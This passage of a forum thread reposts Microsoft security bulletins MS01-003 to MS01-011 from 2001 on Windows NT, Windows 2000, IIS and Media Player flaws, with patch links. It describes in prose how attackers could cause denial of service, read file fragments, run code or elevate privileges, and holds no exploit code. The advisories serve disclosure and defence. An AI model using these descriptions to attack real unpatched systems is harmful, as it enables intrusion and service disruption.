This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Dave Aitel and Frank Swiderski of @Stake ( www.atstake.com (http://www.atstake.com) ) for reporting this issue to us and working with us to protect customers.
Revisions:
January 22, 2001: Bulletin created.
January 25, 2001: Version 2.0 Bulletin revised to reflect availability of an updated patch and changes in the conditions required to exploit the vulnerability.
socalgal
01-26-2001, 06:59 PM
Microsoft Security Bulletin (MS01-003)
Patch Available for "Winsock Mutex" Vulnerability
Originally posted: January 24, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows NT 4.0. The vulnerability could allow a malicious user to run a special program to disable an affected computer’s network functionality.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-003.asp
Issue
Like all other objects under Windows NT 4.0, mutexes – synchronization objects that govern access to resources – have permissions associated with them, that govern how they can be accessed. However, a particular mutex used to govern access to a networking resource has inappropriately loose permissions. This could enable an attacker who had the ability to run code on a local machine to monopolize the mutex, thereby preventing any other processes from using the resource that it controlled. This would have the effect of preventing the machine from participating in the network.
The attacker would require interactive logon access to the affected machine. This significantly limits the scope of the vulnerability because, if normal security recommendations have been followed, unprivileged users will not be granted interactive logon rights to critical machines like servers. Unprivileged users typically are granted interactive logon rights to workstations and terminal servers. However, a workstation would not be a tempting target for an attacker, because he could only use this vulnerability to deny service to himself. The machines most likely to be affected would be terminal servers.
Affected Software Versions:
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0, Terminal Server Edition
Patch Availability:
Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27272
Windows NT 4.0, Terminal Server Edition: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27291
Note: Additional security patches are available at the Microsoft Download Center.
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-003, http://www.microsoft.com/technet/security/bulletin/fq01-003.asp
Microsoft Knowledge Base article Q279336 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Arne Vidstrom ( http://ntsecurity.nu ) for reporting this issue to us and working with us to protect customers.
Revisions:
January 24, 2001: Bulletin Created.
socalgal
01-30-2001, 06:43 AM
Microsoft Security Bulletin (MS01-004)
Patch Available for New Variant of “File Fragment Reading via .HTR” Vulnerability
Originally posted: January 29, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Internet Information Service. The vulnerability could allow enable an attacker, under very unusual conditions, to read fragments of files from a web server.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-004.asp
Issue:
This vulnerability involves a new variant of the “File Fragment Reading via .HTR” vulnerability, previous variants of which were discussed in Microsoft Security Bulletins MS00-031 and MS00-044. Like the original variants, this one could enable an attacker to request a file in a way that would cause it to be processed by the .HTR ISAPI extension. The result of doing this is that fragments of server-side files like .ASP files could potentially be sent to the attacker. There is no capability via the vulnerability to add, change or delete files on the server, or to access a file without permissions.
There are a number of significant restrictions on this vulnerability:
The effect of normal .HTR processing would be to strip out the very data that would be most likely to contain sensitive data.
There would need to be zeros fortuitously located in the server memory in order for the file fragments to be sent.
If best practices have been followed regarding the need to avoid ever storing sensitive information in .ASP and other server-side files, there will be no sensitive information in the file to begin with.
Customers who have previously disabled the .HTR functionality would not be affected by this vulnerability. Microsoft recommends that all customers who haven’t already disabled .HTR do so, unless there is a business-critical reason for keeping it. For the latter group of customers, a patch is available that eliminates this vulnerability, as well as those discussed in Microsoft Security Bulletins MS00-031 and MS00-044.
Affected Software Versions:
Microsoft Internet Information Server 4.0
Microsoft Internet Information Service 5.0
Patch Availability
As noted above, the recommended method of eliminating this vulnerability is to disable .HTR. (Instructions for doing this are provided in the FAQ). Customers who must retain the .HTR functionality should apply the patch:
IIS 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27492
IIS 5.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27491
Note: The patch also eliminates the vulnerabilities discussed in Microsoft Security Bulletins MS00-031 and MS00-044.
Note: The IIS 4.0 patch can be applied to systems running Windows NT 4.0 Service Packs 5 and 6a. It will be included in Service Pack 7.
Note: The IIS 5.0 patch can be applied to systems running Windows 2000 Gold and Service Packs 1 and 2. It will be included in Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-004, http://www.microsoft.com/technet/security/bulletin/fq01-004.asp
Microsoft Knowledge Base article Q285985 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions:
January 29, 2001: Bulletin Created.
socalgal
01-30-2001, 07:14 PM
Microsoft Security Bulletin (MS01-005)
Tool and Patch Available to correct Hotfix Packaging Anomalies
Originally posted: January 30, 2001
Summary:
Microsoft has released a tool and patch that allow customers to diagnose and eliminate the effects of anomalies in the packaging of hotfixes for English language versions of Microsoft® Windows 2000. Under certain circumstances, these anomalies could cause the removal of some hotfixes, which could include some security patches, from a Windows 2000 system.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-005.asp
Issue:
Microsoft packages all Windows 2000 hotfixes (including security patches) with a catalog file that lists all of the valid hotfixes that have been issued to date. The catalog is digitally signed to ensure its integrity, and Windows File Protection uses the signed catalog to determine which hotfixes are valid.
An error in the production of the catalog files for English language Windows 2000 Post Service Pack 1 hotfixes made available through December 18, 2000 could, under very unlikely circumstances, cause Windows File Protection to remove a valid hotfix from a system. The removal of a hotfix could cause a customer’s system to revert to a version of a Windows 2000 module that contained a security vulnerability.
Windows File Protection will only remove valid hotfixes from a Windows 2000 system under a very restrictive set of circumstances. The system administrator would have to have applied multiple hotfixes in an order other than that in which Microsoft produced and packaged them. Furthermore, Windows File Protection would only remove hotfixes from a system if it were run explicitly (by running sfc/scannow for instance) or triggered by some administrator action (such as specifying that it be invoked under a group policy).
Affected Software Versions:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Patch Availability:
Diagnostic tool: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27333
Microsoft Windows 2000 Gold: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27332
Microsoft Windows 2000 SP1: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27330
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-005, http://www.microsoft.com/technet/security/bulletin/fq01-005.asp
Microsoft Knowledge Base article Q281767 discusses this issue and will be available soon.
Microsoft Knowledge Base article Q282784 describes the tool released to address this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions:
January 30, 2001: Bulletin Created.
socalgal
01-31-2001, 07:54 PM
Microsoft Security Bulletin (MS01-006)
Patch Available for “Invalid RDP Data” Vulnerability
Originally posted: January 31, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability affecting Microsoft® Windows® 2000 terminal servers. The vulnerability could allow an attacker to cause an affected server to fail.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-006.asp
Issue:
The implementation of the Remote Data Protocol (RDP) in Windows 2000 Terminal Service does not correctly handle a particular series of data packets. If such a series of packets were received by an affected server, it would cause the server to fail. The server could be put back into normal service by rebooting it, but any work in progress at the time of the attack would be lost.
It would not be necessary for an attacker to be able to start a session with an affected server in order to exploit this vulnerability – he would only need the ability to send the correct series of packets to the RDP port on the server. The specific sequence of data packets involved in this vulnerability cannot be generated as part of a legitimate terminal server session. Windows NT 4.0 terminal servers are not affected by this vulnerability.
Affected Software Versions:
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Note: The above products are only affected by this vulnerability if used as terminal servers.
Note: This patch can be applied to systems running Windows 2000 Gold, Service Pack 1, and Service Pack 2. It will be included in Windows 2000 Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-006, http://www.microsoft.com/technet/security/bulletin/fq01-006.asp
Microsoft Knowledge Base article Q286132 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Yoichi Ubukata and Yoshihiro Kawabata for reporting this issue to us and working with us to protect customers.
Revisions:
January 31, 2001: Bulletin Created.
socalgal
02-05-2001, 07:16 PM
Microsoft Security Bulletin (MS01-007)
Patch Available for “Network DDE Agent Request” Vulnerability
Originally posted: February 05, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows® 2000. The vulnerability could, under certain conditions, allow an attacker to gain complete control over an affected machine.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-007.asp
Issue:
Network Dynamic Data Exchange (DDE) is a technology that enables applications on different Windows computers to dynamically share data. This sharing is effected via communications channels called trusted shares, which are managed by a service called the Network DDE Agent. By design, processes on the local machine can levy requests upon the Network DDE Agent, including ones that indicate what application should be run in conjunction with a particular trusted share. However, a vulnerability exists because, in Windows 2000, the Network DDE Agent runs using the Local System security context and processes all requests using this context, rather than that of the user. This would give an attacker an opportunity to cause the Network DDE Agent to run code of her choice in Local System context, as a means of gaining complete control over the local machine.
In order to exploit this vulnerability, the attacker would need the ability to run a program on an affected machine that would levy the appropriate requests. However, best practices strongly recommend against ever allowing unprivileged users to run code on security-critical machines such as domain controllers and other servers; if these recommendations have been followed, such machines would not be at risk. In addition, terminal servers are not affected by this vulnerability (except in the case where unprivileged users are allowed to log on at the console, which is never recommended). As a result, workstations are likely to be the machines primarily affected by the vulnerability. This would tend to limit the damage that could be done via this vulnerability because, in most cases, even gaining complete control of a workstation would not convey any additional privileges on the domain.
Microsoft recommends that customers using Windows 2000 workstations or who allow unprivileged users to run code on Windows 2000 servers apply the patch immediately. In addition, customers operating Windows 2000 web servers should consider applying the patch to those machines as well, as a precautionary measure. If an attacker were able to gain the ability to run code in a restricted context on a web server via another vulnerability, this vulnerability would provide a way to immediately elevate her privileges and cause broader damage.
Affected Software Versions:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Note: This patch can be installed on systems running Windows 2000 Gold, Service Pack 1, and Service Pack 2. It will be included in Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-007, http://www.microsoft.com/technet/security/bulletin/fq01-007.asp
Microsoft Knowledge Base article Q285851 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Dildog of @Stake ( http://www.atstake.com ) for reporting this issue to us and working with us to protect customers.
Revisions:
February 05, 2001: Bulletin Created.
socalgal
02-07-2001, 06:29 PM
Microsoft Security Bulletin (MS01-008)
Patch Available for "NTLMSSP Privilege Elevation" Vulnerability
Originally posted: February 07, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows NT 4.0. The vulnerability could allow a locally logged on user to grant herself administrator level privileges.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-008.asp
Issue:
A flaw in the NTLM Security Support Provider (NTLMSSP) service could potentially allow a non-administrative user to gain administrative control over the system. In order to perform this attack the user would need a valid login account and the ability to execute arbitrary code on the system.
This vulnerability could only be exploited by an attacker who could log onto the affected machine interactively. However, best practices strongly suggest that unprivileged users not be allowed to interactively log onto business-critical servers like domain controllers, ERP servers, print and file servers, database servers, and others. If this recommendation has been followed, machines such as these would not be at risk from this vulnerability and, as a result, the machines most likely to be affected would be workstations and terminal servers.
Affected Software Versions:
Microsoft Windows NT 4.0 Workstation
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Patch Availability
Microsoft Windows NT 4.0 Workstation, Server, and Enterprise Edition: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27804
Microsoft Windows NT 4.0 Server, Terminal Server Edition:
(will be available shortly)
NOTE: This patch may be applied to Windows NT 4.0 Service Pack 6a.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-008, http://www.microsoft.com/technet/security/bulletin/fq01-008.asp
Microsoft Knowledge Base article Q280119 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments:
Microsoft thanks Todd Sabin of Bindview's RAZOR team ( http://razor.bindview.com ) for reporting this issue to us and working with us to protect customers.
Revisions:
February 07, 2001: Bulletin Created.
socalgal
02-09-2001, 07:21 PM
Microsoft Security Bulletin (MS01-007)
Patch Available for “Network DDE Agent Request” Vulnerability
Originally posted: February 05, 2001
Revised: February 09, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows® 2000. The vulnerability could, under certain conditions, allow an attacker to gain complete control over an affected machine.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-007.asp
Issue:
Network Dynamic Data Exchange (DDE) is a technology that enables applications on different Windows computers to dynamically share data. This sharing is effected via communications channels called trusted shares, which are managed by a service called the Network DDE Agent. By design, processes on the local machine can levy requests upon the Network DDE Agent, including ones that indicate what application should be run in conjunction with a particular trusted share. However, a vulnerability exists because, in Windows 2000, the Network DDE Agent runs using the Local System security context and processes all requests using this context, rather than that of the user. This would give an attacker an opportunity to cause the Network DDE Agent to run code of her choice in Local System context, as a means of gaining complete control over the local machine.
In order to exploit this vulnerability, the attacker would need the ability to run a program on an affected machine that would levy the appropriate requests. However, best practices strongly recommend against ever allowing unprivileged users to run code on security-critical machines such as domain controllers and other servers; if these recommendations have been followed, such machines would not be at risk. As a result, workstations and terminal servers are likely to be the machines primarily affected by the vulnerability. This would tend to limit the damage that could be done via this vulnerability because, in most cases, even gaining complete control of either type of machine would not convey any additional privileges on the domain.
Microsoft recommends that customers using Windows 2000 workstations or who allow unprivileged users to run code on Windows 2000 servers apply the patch immediately. In addition, customers operating Windows 2000 web servers should consider applying the patch to those machines as well, as a precautionary measure. If an attacker were able to gain the ability to run code in a restricted context on a web server via another vulnerability, this vulnerability would provide a way to immediately elevate her privileges and cause broader damage.
Affected Software Versions:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Patch Availability http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27526
Note: This patch can be installed on systems running Windows 2000 Gold, Service Pack 1, and Service Pack 2. It will be included in Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-007, http://www.microsoft.com/technet/security/bulletin/fq01-007.asp
Microsoft Knowledge Base article Q285851 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Dildog of @Stake ( http://www.atstake.com ) for reporting this issue to us and working with us to protect customers.
Revisions:
February 05, 2001: Bulletin Created.
February 09, 2001: Bulletin revised to provide updated information regarding terminal servers. Contrary to the original version of the bulletin, terminal servers are affected by the vulnerability.
socalgal
02-13-2001, 08:14 PM
Microsoft Security Bulletin (MS01-009)
Patch Available for “Malformed PPTP Packet Stream” Vulnerability
Originally posted: February 13, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows NT® 4.0 servers that provide secure remote sessions. The vulnerability could allow an attacker to prevent an affected machine from providing useful service.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-009.asp
Issue:
The PPTP service in Windows NT 4.0 has a flaw in a part of the code that handles a particular type of data packet, which results in a leak of kernel memory. If a sufficient number of packets containing a specific malformation were received by an affected server, kernel memory would eventually become exhausted. The likely outcome would be that the server would either hang or fail altogether. In either case, the machine would need to be rebooted to restore normal operation, and any PPTP sessions underway at the time would be lost. It would not be necessary for the attacker to establish a valid PPTP session in order to exploit the vulnerability.
The vulnerability does not threaten the security of the data within PPTP sessions in any way – it is strictly a denial of service vulnerability. Only machines running the PPTP service would be affected by this vulnerability (the service does not run by default). Windows 2000 machines, even ones running PPTP, would not be affected by this vulnerability.
Affected Software Versions:
Microsoft Windows NT 4.0 Server
Microsoft Windows NT 4.0 Server, Enterprise Edition
Microsoft Windows NT 4.0 Server, Terminal Server Edition
Patch Availability:
Windows NT 4.0 Server and Windows NT 4.0 Server, Enterprise Edition: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27836
Windows NT 4.0 Server, Terminal Server Edition:
To be released shortly.
Note: This patch can be applied to systems running Windows NT 4.0 Service Pack 6a. The fix will be included in Windows NT 4.0 Service Pack 7.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-009, http://www.microsoft.com/technet/security/bulletin/fq01-009.asp
Microsoft Knowledge Base article Q283001 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp.
Acknowledgments:
Microsoft thanks Kirk Corey of Diversified Software Industries, Inc. (www.dsi-inc.net) for reporting this issue to us and working with us to protect customers.
Revisions:
February 13, 2001: Bulletin Created.
socalgal
02-15-2001, 07:34 AM
Microsoft Security Bulletin (MS01-010)
Patch Available for "Windows Media Player Skins File Download" Vulnerability
Originally posted: February 14, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows Media™ Player 7. This vulnerability could potentially enable a malicious user to cause a program of his choice to run on another user’s computer.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-010.asp
Issue:
Windows Media Player 7 introduced a feature called "skins", that allows customization of the look and feel of Windows Media Player. If a Windows Media Player skin (.WMZ) file were downloaded from a malicious web site it could potentially be used to run Java code to read and browse files on a local machine. The vulnerability stems from the fact that "skins" are downloaded to a known location on a victim's computer and are stored in a .zip package. If the .zip package contained a Java class (.class) file, any Java code in this class could be executed under the local computer security zone.
If a Windows Media Player skin (.WMZ) file were downloaded from a malicious web site, it could potentially cause the deployment of zipped Java code to a known location on the visiting user’s machine. Since the Java code would reside in a known location on the machine, script hosted on a hostile web site or embedded in a hostile HTML mail message could potentially invoke the script in the local computer security zone to take arbitrary action on the user’s machine.
Affected Software Versions:
Microsoft Windows Media Player 7
Patch Availability:
Microsoft Windows Media Player 7: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27961
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-010, http://www.microsoft.com/technet/security/bulletin/fq01-010.asp
Microsoft Knowledge Base article Q287045 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions:
February 14, 2001: Bulletin Created.
socalgal
02-20-2001, 08:50 PM
Microsoft Security Bulletin (MS01-011) (http://www.microsoft.com/technet/security/bulletin/MS01-011.asp)
Malformed Request to Domain Controller can Cause Denial of Service
Originally posted: February 20, 2001
Summary:
Who should read this bulletin: System administrators
Impact of vulnerability: Denial of service
Recommendation: Install patch on domain controllers
Affected Software:
Microsoft® Windows® 2000 Server
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Technical details <linked in bulletin>
Technical description:
A core service running on all Windows 2000 domain controllers (but not on any other machines) contains a flaw affecting how it processes a certain type of invalid service request. Specifically, the service should handle the request at issue here by determining that it is invalid and simply dropping it; in fact, the service performs some resource-intensive processing and then sends a response.
If an attacker sent a continuous stream of such requests to an affected machine, it could consume most or all of the machine’s CPU availability. This could cause the domain controller to process requests for service slowly or not at all, and could limit the number of new logons the machine could process and the number of Kerberos tickets that could be issued.
Mitigating factors:
The machine would automatically resume normal processing as soon as the stream of requests ceased.
Although the attacker could, in theory, use the vulnerability to completely deny service to network users, in practice the attack rarely consumes more than 75% of the available CPU resources.
Users who were already logged on and were using previously issued tickets would not be affected by domain controller unavailability.
If there were multiple domain controllers on the domain, the unaffected machines could pick up the other machine’s load.
If normal security practices have been followed, Internet users would be prevented by firewalling and other measures from levying requests directly to domain controllers.
Vulnerability identifier: CAN-2001-0018
Frequently asked questions:<linked in bulletin>
What’s the scope of the vulnerability?
This is a denial of service vulnerability. By sending a continuous stream of specially malformed packets to a domain controller, an attacker could consume most or all of the machine’s resources, potentially preventing it from authenticating users. In the worst case, the net result could be that new users might be unable to log on, and logged-on users might be unable to use some network resources.
The effects of the attack would not be permanent, and normal processing would resume once the stream of packets was stopped. If there were multiple domain controllers on a domain, the other machines would assume part of the affected machine’s load. Also, if best practices have been followed, the vulnerability could only be exploited by a user within the network -- the ports used in this attack should be blocked at the firewall.
What causes the vulnerability? <linked in bulletin>
This vulnerability results because one of the services used by Windows 2000 domain controllers doesn’t appropriately validate requests before processing them. In at least one case, the service would attempt to process an invalid request, rather than simply discarding it. This processing is fairly resource-intensive.
What could an attacker do via this vulnerability?
By sending the domain controller a continuous stream of specially selected invalid requests, an attacker could disrupt service on the machine. Specifically, she could cause the machine to devote most or all of its resources to responding to invalid requests, which would cause the machine’s response to other, valid requests to slow or stop altogether.
If a domain controller’s resources were monopolized in this fashion, what would be the effect?
Let’s consider the worst case, in which there’s only a single domain controller in the domain, and the attacker manages to use 100% of the machine’s resources. In this case, the principal effect of a successful attack via this vulnerability would be to prevent the domain controller from logging new users onto the domain, and to prevent the machine from fulfilling queries to the Active Directory.
Would an attack prevent previously logged-on users from using network resources?
Not necessarily. Recall the Windows 2000 uses Kerberos as its default authentication protocol. In Kerberos, the domain controller does not authenticate every use of network resources, but instead provides a reusable ticket the first time a user requests a particular resource. When the user subsequently needs to use a particular resource, the domain controller doesn’t need to be involved in the authentication process. This means even in the case of a successful attack, users would be able to continue using any resources for which they already had tickets, but they might be unable to obtain new tickets for other resources.
Could this vulnerability cause the domain controller to fail?
No. There is no capability to cause either the machine or the affected service to fail via this vulnerability. This is strictly a denial of service attack effected via resource consumption.
Does the vulnerability always enable the attacker to monopolize all of the machine’s resources?
No. In our tests, we were rarely able to drive CPU utilization higher than 75%.
What if the domain had several domain controllers?
In domains that contain multiple domain controllers, the machines work together and shift their workloads dynamically. The more domain controllers there are in a single domain, the less noticeable the loss of a single one would be.
Couldn’t I just disable the service that contains the flaw?
No. The affected service is one of the core services on domain controllers and cannot be disabled.
This sounds like a flooding attack, rather than true security vulnerability. Is it?
There are some similarities between this vulnerability and a flooding attacking; for instance, the attack would only persist until the attacker stopped sending requests to the affected machine. Typically, we do not issue patches for flooding attacks. However, in this case, we decided to treat this issue as a vulnerability for two reasons:
There are elements of this issue that aren’t like normal flooding attacks. Specifically, a flooding attack usually involves legitimate requests that happen to be resource-intensive to process. In this case, the requests are invalid and the service should discard them after only a cursory inspection.
The machines affected by this vulnerability are domain controllers. Because of the centrality of domain controllers to a network, we chose to err on the side of caution and produce a patch.
Could this vulnerability be exploited from the Internet?
If normal security practices have been followed, this vulnerability could only be exploited from within the network. Typically, domain controllers are not used as network edge machines, and firewalling is used to prevent users outside the network from levying any requests directly upon them. If these practices have been followed, Internet users would not be able to send the malformed request to the affected service, and as a result they would be unable to exploit the vulnerability.
Does this vulnerability affect Windows NT® 4.0 domain controllers?
No. Only Windows 2000 domain controllers are affected.
Does this vulnerability affect Windows 2000 workstations or member servers?
No. It only affects domain controllers.
Who should use the patch?
Microsoft recommends that customers consider installing the patch on their Windows 2000 domain controllers.
What does the patch do?
The patch eliminates the vulnerability by causing the affected service to correctly treat as invalid the request at issue here.
Patch availability:
Download locations for this patch:
Microsoft Windows 2000 Server and Advanced Server: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28064
Microsoft Windows 2000 Datacenter Server:
Patches for Windows 2000 Datacenter Server are hardware-specific and available from the original equipment manufacturer.
Additional information about this patch
Installation platforms: <linked in bulletin>
This patch can be installed on systems running Windows 2000 Gold, Service Pack 1 or Service Pack 2.
Inclusion in future service packs:
The fix for this issue will be included in Windows 2000 Service Pack 3.
Verifying patch installation:
To verify that the patch has been installed on the machine, confirm that the following registry key has been created on the machine:
Localization:
Localized versions of this patch are under development. When completed, they will be available at the locations discussed in "Obtaining other security patches".
Obtaining other security patches:
Patches for other security issues are available from the following locations:
Security patches are available from the Microsoft Download Center, and can be most easily found by doing a keyword search for "security_patch" .
Patches for consumer platforms are available from the WindowsUpdate web site.
All patches available via WindowsUpdate also are available in a redistributable form from the WindowsUpdate Corporate site.
Other information:
Support:
Microsoft Knowledge Base article Q287397 discusses this issue and will be available approximately 24 hours after the release of this bulletin. Knowledge Base articles can be found on the Microsoft Online Support web site.
Technical support is available from Microsoft Product Support Services. There is no charge for support calls associated with security patches.
Security Resources: The Microsoft TechNet Security Web Site provides additional information about security in Microsoft products.
Disclaimer:
The information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.